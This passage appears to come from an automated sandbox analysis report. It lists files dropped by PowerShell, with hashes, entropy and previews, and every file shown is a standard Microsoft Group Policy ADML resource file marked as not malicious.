Encrypted:false
SSDEEP:96:LeD5pmieohnx5hxncDmeoqCcxjBgAeocs7x7BNcGDQaFV:EBtx5h9zqCccQcs75BhDQan
MD5:4DAE700A902336A7ACD9315F2DCB6F00
SHA1:B472C8447E223252B2B43403D60468B62C3FFE2C
SHA-256:DC5A3DE3D24654B83D269B2A74148B777261995A56ABAD7943616BBA648A28AE
SHA-512:3C572957861E0FD9D62F51C8ED0DB407C7C20C1DBCD99B2F06F60DE19D31158367D03C8729E8EC0B41F983D7744F9FEADE91C4AE68434EFEBDF57F9BBC201D9E
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableBackupRestore">Prevent restoring previous versions from backups</string>.. <string id="DisableBackupRestore_Help">This policy setting lets you suppress the Restore button in the previous versions property page when the user has selected a previous version of a local file, in which the previous version is stored on a backup.....If you enable this policy setting, the Restore button is disabled when the user selects a previous version corresponding to a backup.....If you disable this policy setting, the Re
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (568), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):33066
                                                                                                                                                                                                        Entropy (8bit):4.630945231898182
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:YRG9T17KYkXyUrqDiynH2yi4oO+gwlquRfpxHkyT/yT/eaXl+H1CUnJi:tvmrrnlpxHkyedu1CUnw
                                                                                                                                                                                                        MD5:587143E4C31AF88A0591C34F205DB7FB
                                                                                                                                                                                                        SHA1:F6B86A1E88E2822BA2A595E6BD047BD04CCD5C0B
                                                                                                                                                                                                        SHA-256:90D12A7BC2ECAE124C62A43069FCD48E3AAA6F214325372EA82E5727F290D184
                                                                                                                                                                                                        SHA-512:ED01D954728347AA2A0DED6D0F351BDDD5C9CA0254802BCEED01104D5C5909342A15A6D628B4249782151E748514679822A169A3CC846722E1BA81A24D9EAAA3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8" standalone="yes"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowWebPrinting">Activate Internet printing</string>.. <string id="AllowWebPrinting_Help">Internet printing lets you display printers on Web pages so that printers can be viewed, managed, and used across the Internet or an intranet..... If you enable this policy setting, Internet printing is activated on this server..... If you disable this policy setting or do not configure it, Internet printing is not activated..... Internet printing is an extension of Internet In
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (640), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):14598
                                                                                                                                                                                                        Entropy (8bit):4.638367767119586
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:vPo4LQX7miuddCSgP71CTd5xZSq5ynxWmBIY+DOxH++JGQfFD:ox7Idu7Ih5xwqcJJrxPAM
                                                                                                                                                                                                        MD5:5BA865D69814055E09D5698701921315
                                                                                                                                                                                                        SHA1:E0F4F6C1D949A6E2B1A30D4397CED3C175A3F003
                                                                                                                                                                                                        SHA-256:28D160709A578AE08008CE9F84EFA853F0CD30C05AC418ED0085133B7F5BE4F8
                                                                                                                                                                                                        SHA-512:7A09CB06DAE4236124B0CDE8B8C4887C95CEAE97C1EEB8D632AFE142B4ED7BBA4DB52AE3BFF03253C9CE7C5242FD6E8894B74A7AB294BECA5B39429FCF09591F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8" standalone="yes"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0">.. <displayName>Printing Group Policies</displayName>.. <description>Printing Group Policies valid on all Windows flavors except ARM</description>.. <resources>.. <stringTable>.. <string id="RegisterSpoolerRemoteRpcEndPoint">Allow Print Spooler to accept client connections</string>.. <string id="RegisterSpoolerRemoteRpcEndPoint_Help">This policy controls whether the print spooler will accept client connections.....When the policy is unconfigured or enabled, the spooler will always accept client connections.....When the policy is disabled, the spooler will not accept client connections nor allow users to share printers. All printers current
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (424), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):7022
                                                                                                                                                                                                        Entropy (8bit):4.658208655049282
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmxKh8Wc3Ww1nZy8hmiZWV9k4W0DWivt2fpre9hWJT+K3AqcOrzqhScDMFsO:EU3RnY82DVYfUrWd+kxXc0sVcfu9q
                                                                                                                                                                                                        MD5:14D4B2677604A342B26891EFC3597078
                                                                                                                                                                                                        SHA1:A51EBAF7D5FCFF778B9AEDCE6F37C5C9D6B2B0EC
                                                                                                                                                                                                        SHA-256:5EE2DF374170A87F773008D43AEBEBEF3E1C451F0E9A530B6F2CD5C1601E0012
                                                                                                                                                                                                        SHA-512:DB06D2D412763EC3ACA0D03D4694E6D86C4149B57BD31EA91E8C0E0C3ED8C56B15FDBB2B3FB441D5DC3C5BD262FDE2543A27477FF32C2509473B87B5B10DEDEF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Programs">Programs</string>.. <string id="NoProgramsCPL">Hide the Programs Control Panel</string>.. <string id="NoProgramsCPL_Help">This setting prevents users from using the Programs Control Panel in Category View and Programs and Features in Classic View... ..The Programs Control Panel allows users to uninstall, change, and repair programs, enable and disable Windows Features, set program defaults, view installed updates, and purchase software from Windows Marketplace. Programs published or assigned to
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (366), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4835
                                                                                                                                                                                                        Entropy (8bit):4.774670262203608
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmMM44GDFsil1oXY7XlMXC3K8GDFeMbiZC0XEV:EB4eFUXUXuy33eFPAX0
                                                                                                                                                                                                        MD5:81A4179A1F50B390A55CEC61B95F6752
                                                                                                                                                                                                        SHA1:1D21A6C288E6EB744C52CCAA2A81298CAB467B12
                                                                                                                                                                                                        SHA-256:5A277C91D697FECAEBECFD1AA4A38F6027C5800BFB4B5EBEBBA90251C788BEAB
                                                                                                                                                                                                        SHA-512:F79C992F4FA17D80A8B65F7AB9753DBBBC12295B80DBDAA3C71CE417B63F9B39774D4ABF5381FD45320E684728FBD05D3761FF37F53A26A3076DF20C3EA2DB71
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="PswdSync">Password Synchronization</string>.. <string id="Psync_LoggingLevel">Turn on extensive logging for Password Synchronization</string>.. <string id="Psync_LoggingLevel_Help">This policy setting allows an administrator to turn on extensive logging for Password Synchronization.....If you enable this policy setting, all affected computers that are running Password Synchronization log intermediate steps for password synchronization attempts.....If you disable or do not configure this policy setting, in
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):22100
                                                                                                                                                                                                        Entropy (8bit):4.777240545794819
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:S0I0F0I0w0i0O0Q0c0K0F1P0mDeWvyz0gx0YV0BI0l+0Xe0X:f+
                                                                                                                                                                                                        MD5:5A29BFD51F48A0377276834F0B8BAF80
                                                                                                                                                                                                        SHA1:E1F484C1462470950E95ADC7D7E4FC1A6FA273B6
                                                                                                                                                                                                        SHA-256:39B7A57E44813AFFEF1380FC4A2CE929EDAAAB031B457C50381A76996FD6B654
                                                                                                                                                                                                        SHA-512:DE4B16EDBAB62DEDF2AC48ABF223AE084B29A7DC6231507ECE14DF273CECA57F1E86C4C9AFAF0CE627394C6523E7D140A1A60E8E9B8D5D7FA93C57304BEE2AF3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="QosDBMC_BestEffort_Help">Specifies an alternate Layer-3 Differentiated Services Code Point (DSCP) value for packets with the Best Effort service type (ServiceTypeBestEffort). The Packet Scheduler inserts the corresponding DSCP value in the IP header of the packets.....This setting applies only to packets that conform to the flow specification.....If you enable this setting, you can change the default DSCP value associated with the Best Effort service type.....If you disable this setting, the system uses the default
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (491), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):13725
                                                                                                                                                                                                        Entropy (8bit):4.739504626052788
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:EuPHdbK3t1tsbRP7MaC+9D29YVm8yvRyd4+gzsBUNh8yhXOLzUFoNP1npbNjtKjr:9vdew4argz4/gzsGbF5OLzQm1pFtcr
                                                                                                                                                                                                        MD5:C7D0520662B4D6F3A33CD02E7D078832
                                                                                                                                                                                                        SHA1:2092E311A0CDB5F1EDBFC9D3A39490EA6F061314
                                                                                                                                                                                                        SHA-256:A1595A8F7F77496CB3DAE9BA4A8787985FF7C5C7B50BCE6EA19ECC823B874C57
                                                                                                                                                                                                        SHA-512:0F23E0D8B3A0C3007C81794DEA01E218A6810AF134BB40DE84C7509BC2F82C0E6F919E4C2994C2964C977C9F7EC0DFB4456328C928C3A3A67B5EC1126152ACE0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Rpc">Remote Procedure Call</string>.. <string id="RpcEEInfoOff">Off</string>.. <string id="RpcEEInfoOffWithExc">Off with Exceptions</string>.. <string id="RpcEEInfoOn">On</string>.. <string id="RpcEEInfoOnWithExc">On with Exceptions</string>.. <string id="RpcEnableAuthEpResolution">Enable RPC Endpoint Mapper Client Authentication</string>.. <string id="RpcEnableAuthEpResolution_Help">This policy setting controls whether RPC clients authenticate with the Endpoint Mapper Service when the
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1378
                                                                                                                                                                                                        Entropy (8bit):4.961792727852399
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3FNPKJAzSIveqsUA0j01oSxz1kFV:cgeD5x8gmYAkFVgeMFV
                                                                                                                                                                                                        MD5:B8793F540E47EE449A0369A0569CFB8A
                                                                                                                                                                                                        SHA1:3701D0618E2079A6EFDAD7748C21B6B236CD2070
SHA-256:4BEFE402E1D8BAF094346887C509331398720109298EEB4DD947879DFE0A9216
SHA-512:59C4192172AC1BF0278659B1876B3E71ECDD0FE4E2E6B0EC33796C75566F85C0BD1AD6FF5D3BC57382532D65CA3914982369F199781B1DC6E84C1B69CA517D32
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Reliability Analysis Component</displayName>.. <description>Reliability Analysis Component</description>.. <resources>.. <stringTable>.. <string id="RAC">Windows Reliability Analysis</string>.. <string id="ConfigureRacWmi">Configure Reliability WMI Providers</string>.. <string id="ConfigureRacWmi_help">This policy setting allows the Windows Management Instrumentation (WMI) providers Win32_ReliabilityStabilitymetrics and Win32_ReliabilityRecords to provide data to Reliability Monitor in the Action Center control panel, and to respond to WMI requests.....If you enable or do not configure this policy setting, the listed providers will resp

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (563), with CRLF line terminators
Category:dropped
Size (bytes):2714
Entropy (8bit):4.801755208450146
Encrypted:false
SSDEEP:48:cgeD5x8gm8fKbFnok+9MKFLOL5dEyIsaVZ57O0BsYu+P4XEgV:LeD5pmnFnok+9RL+M5jVZ8CsuPeV
MD5:64AFB930E79CDCDF1D967B37180DEC5C
SHA1:AA45CC6BCA49EF263EC3880FFE65F1C5D936CC70
SHA-256:8C710DC3983ED5962C5F7D40C3390C660AE7597CEA71F2BF8FF68B6EFC594CB7
SHA-512:BF40F01F07FB8674902D50A9C7B6C3636714B6C3E5FFC1D045689B46A63024379CB1FE45092FF98912E265433FD4A8970B4CCF539F1AA56831E2283231D55AC7
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiScenarioCategory">Windows Resource Exhaustion Detection and Resolution</string>.. <string id="WdiScenarioExecutionPolicy">Configure Scenario Execution Level</string>.. <string id="WdiScenarioExecutionPolicyExplain">Determines the execution level for Windows Resource Exhaustion Detection and Resolution.....If you enable this policy setting, you must select an execution level from the dropdown menu. If you select problem detection and troubleshooting only, the Diagnostic Policy Service (DPS) will detect

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (483), with CRLF line terminators
Category:dropped
Size (bytes):1817
Entropy (8bit):4.807685062167235
Encrypted:false
SSDEEP:48:cgeD5x8gmclqzPa520pns19F9K0SppRPRDdamFV:LeD5pmnvI3R9FV
MD5:74A0325268266B2CDE0E3F5F1597F203
SHA1:088E690A896920238445D6605ACBE4F40498742F
SHA-256:11AB21A9F9176CBC644DBDC5020FA4791086234FB126A5F0885315EFD299BB35
SHA-512:D79952DFB16CF46EF6D91DC4031CDAD7F7D060E92E16E18CECA3CA5B69F017C895FD54655F05F6CEE08C027CC3981BDA16F798726C69A39C95FF923D763B72F0
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Recovery</displayName>.. <description>Recovery</description>.. <resources>.. <stringTable>.. <string id="WinRE">Recovery</string>.. <string id="ConfigureWinRESetup">Allow restore of system to default state</string>.. <string id="ConfigureWinRESetup_help"> Requirements: Windows 7.. Description: This policy setting controls whether users can access the options in Recovery (in Control Panel) to restore the computer to the original state or from a user-created system image..... If you enable or do not configure this policy setting, the items "Use a system image you created earlier to recover your computer" and "Reinstall Windows" (

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):5310
Entropy (8bit):4.781992069178365
Encrypted:false
SSDEEP:96:LeD5pmAydEk3E7mEvPexos3w33I3tcGBQ4pdV:E8EkCmE3exoiO32tTBQy
MD5:0B7DB39B4E35B6787C19C79280664C11
SHA1:870AA05E92B4B0FACEC8EC4E7D8F5C428748A5A4
SHA-256:3FC94A050B5B845BF0D21AB6D0718A5BC0FD292624A6AA4E7D8E06317DE34863
SHA-512:6E9A356BCE00B25A998A0B63BF6C0B29521DE43DD155712A025311518DC212384C4599B48D403E3E1DD2580E3B5F1D6688930D7441A66488C6A7870EF3233F87
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="EE_EnablePersistentTimeStamp">Enable Persistent Time Stamp</string>.. <string id="EE_EnablePersistentTimeStamp_Help">This policy setting allows the system to detect the time of unexpected shutdowns by writing the current time to disk on a schedule controlled by the Timestamp Interval.....If you enable this policy setting, you are able to specify how often the Persistent System Timestamp is refreshed and subsequently written to the disk. You can specify the Timestamp Interval in seconds.....If you disable this

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (455), with CRLF line terminators
Category:dropped
Size (bytes):10373
Entropy (8bit):4.861749081876546
Encrypted:false
SSDEEP:192:E2YJPhavu9rf+gZnyy8uI30F3GF3QRcb4vervzv6lQ4:Nfu9rf+CZ8uI30F3GF3QRcbSebjqQ4
MD5:F239E9C6B37ABE7AEE14C64FCD64D86A
SHA1:D703C2A53723A2F933DE2456E706154A29194247
SHA-256:428CCC88349680A1684A33176FED4E4B8BC544EC7B29DCD71CB17BFFE274D16F
SHA-512:8221ABD08D82C27C4AAE3136E8E085C56BF8FF3D4059583F744C5837C61AAD0832D9AE5E84EF77780890A01684EB4F5D5CA33A7E35986435F771FDB67F66D11F
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="RA_Logging">Turn on session logging</string>.. <string id="RA_Logging_Help">This policy setting allows you to turn logging on or off. Log files are located in the user's Documents folder under Remote Assistance.....If you enable this policy setting, log files are generated.....If you disable this policy setting, log files are not generated.....If you do not configure this setting, application-based settings are used.</string>.. <string id="RA_Optimize_Bandwidth">Turn on bandwidth optimization</string>..

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (302), with CRLF line terminators
Category:dropped
Size (bytes):13642
Entropy (8bit):4.756771021239847
Encrypted:false
SSDEEP:192:EnzGj8hc8ROewd8BWwfZ6P0OuI3CDzGvnt7fdXV/gBLtDNGaUgmGaUTGaUFmGaU6:NtjIvGaUBGaUTGaUEGaUUGaUW
MD5:3C7C9203B770747E42F16415384ACA91
SHA1:577E03EBA471F120DB1A1D96648E18E215C57982
SHA-256:61727D2632E0E816A562C6489E5732206A94D3F3581D35042F72FC03A7ECD3D0
SHA-512:7C3F140959497EC753935942A4CB063BA3D431D1F5C4A6FA16BEBD065DE5280C9C0AC34E2A938E413CC7B68A78D2C33BE73DE58F74B1BD71A4A8DBDD12ABF080
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AccessRights_RebootTime">Set time (in seconds) to force reboot</string>.. <string id="AccessRights_RebootTime_Help">This policy setting configures the amount of time (in seconds) that the operating system waits to reboot in order to enforce a change in access rights to removable storage devices.....If you enable this policy setting, you can set the number of seconds you want the system to wait until a reboot.....If you disable or do not configure this setting, the operating system does not force a reboot.....N

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (331), with CRLF line terminators
Category:dropped
Size (bytes):12538
Entropy (8bit):4.768527840947223
Encrypted:false
SSDEEP:192:E4w/xBxQzr/8RRROAHPKc16VcDuJxR1Vi3ia67NitbK0pft+pw7TUlyUAGSJ:wnRRPgHkS9A9D1P
MD5:6B1C987D0C322DD0DD627EC2020F90AC
SHA1:C25254DCB050E342AB84633F084B9ABC06EF9239
SHA-256:EBC840298B0A1FB37F1DB1DF288FC5FAEA981B2F8AE4BE9E0E07D11A1E9E0FB5
SHA-512:915A3DB4C3C0572BE46009BA976FFB606FD304B5908207F288C06DFA6A2281153304E7FF368E446BB8CE5217E0DB4FF849DD2119904007057D85ADEBB9B75325
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="MaxGPOScriptWaitPolicy">Specify maximum wait time for Group Policy scripts</string>.. <string id="MaxGPOScriptWaitPolicy_Help">This policy setting determines how long the system waits for scripts applied by Group Policy to run. ....This setting limits the total time allowed for all logon, logoff, startup, and shutdown scripts applied by Group Policy to finish running. If the scripts have not finished running when the specified time expires, the system stops script processing and records an error event.....If y

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (622), with CRLF line terminators
Category:dropped
Size (bytes):2466
Entropy (8bit):4.781426635707619
Encrypted:false
SSDEEP:48:cgeD5x8gm8fKBtxHxPUNbhQaB6+J5KaeKUYF1vKUYox2P1C9L5GkMo/2VcSurcFV:LeD5pmdtxHxG64MYfYo8NQL8IGrccFV
MD5:BB7C4CF9B3DDFEFAE5FF4C38B5026EB3
SHA1:157C536B83CB87B194C8BF8018A965EF72DC314B
SHA-256:F49034EF8C96F7E5A19AFB7873AFB1A3F289630390E36C163B12FD2DDC15637A
SHA-512:DE9E2E1824A0B9B03AFC476090D361DD5808C6D0B6C8EB70C7DFC590D8B222C78D062CAB2580E8F74F243CD713EB268BFC72BE232698F15CA269EE007F6B41DE
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="SecurityCenter">Security Center</string>.. <string id="SecurityCenter_SecurityCenterInDomain">Turn on Security Center (Domain PCs only)</string>.. <string id="SecurityCenter_SecurityCenterInDomain_Help">This policy setting specifies whether Security Center is turned on or off for computers that are joined to an Active Directory domain. When Security Center is turned on, it monitors essential security settings and notifies the user when the computer might be at risk. The Security Center Control Panel categ

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):2056
Entropy (8bit):4.6874178503699655
Encrypted:false
SSDEEP:48:cgeD5x8gm8fKcgWEhQnwgbc+ijJzo/DQxCGgbxCEinEqcN8gUOZFV:LeD5pmkRLRSo/k0V0EvN4CFV
MD5:7CAFF134D90FB9D9BFFD1931A3B7A077
SHA1:6C1305F61CF2978F73F3C8DF3FB7639BC3761863
SHA-256:B102166CF6A473DCE4ADC301156086D0EBA710EFFFA1C4A569EA480994A7F5B4
SHA-512:2D7427C5572797903A6539A872B9AF3062F23BDF24E3004EC61388D321ABBDCF1D063DB00F5703BDC708AA1AE1B5FCF3262F961C3E9CFBC44BFDE8C001A4583D
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableSensors">Turn off sensors</string>.. <string id="DisableSensors_Explain">.. This policy setting turns off the sensor feature for this computer..... If you enable this policy setting, the sensor feature is turned off, and all programs on this computer cannot use the sensor feature..... If you disable or do not configure this policy setting, all programs on this computer can use the sensor feature... </string>.. <string id="DisableLocation">Turn off location</string>..

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (387), with CRLF line terminators
Category:dropped
                                                                                                                                                                                                        Size (bytes):4955
                                                                                                                                                                                                        Entropy (8bit):4.805565480068189
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmHhpF4FGEkPDY1o1NucOc3EfqYz0LYS0zYS0jfBQ3V:E2hpi4rPE1o1NudbrUMqfBQF
                                                                                                                                                                                                        MD5:65C390CEDEDFD130518B61FA1235250A
                                                                                                                                                                                                        SHA1:6A55E7AC36FE463A16AF0BE1F7F8B5C1848C0D97
                                                                                                                                                                                                        SHA-256:E47082B33ACA0FB727E6486ECA05ED0F7E309923D214DF7D6D1E9E1BB6B58A93
                                                                                                                                                                                                        SHA-512:FAC7D91F8DAE73E2719FE7D9E8BDAE71A4B3DD4375943DA8F0B9992E4554E0E95A503BB5F5EEAC6E6475209F9051B343D2928D028A3355EA58F987DD76ADD03D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="SUPPORTED_WindowsServer2008OrWindowsServer2008R2Only">Windows Server 2008 and Windows Server 2008 R2 operating systems only</string>.. <string id="DoNotLaunchServerManager">Do not display Server Manager automatically at logon</string>.. <string id="DoNotLaunchServerManagerHelp">This policy setting allows you to turn off the automatic display of Server Manager at logon.....If you enable this policy setting, Server Manager is not displayed automatically when a user logs on to the server.....If you disable t
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (408), with CRLF line terminators
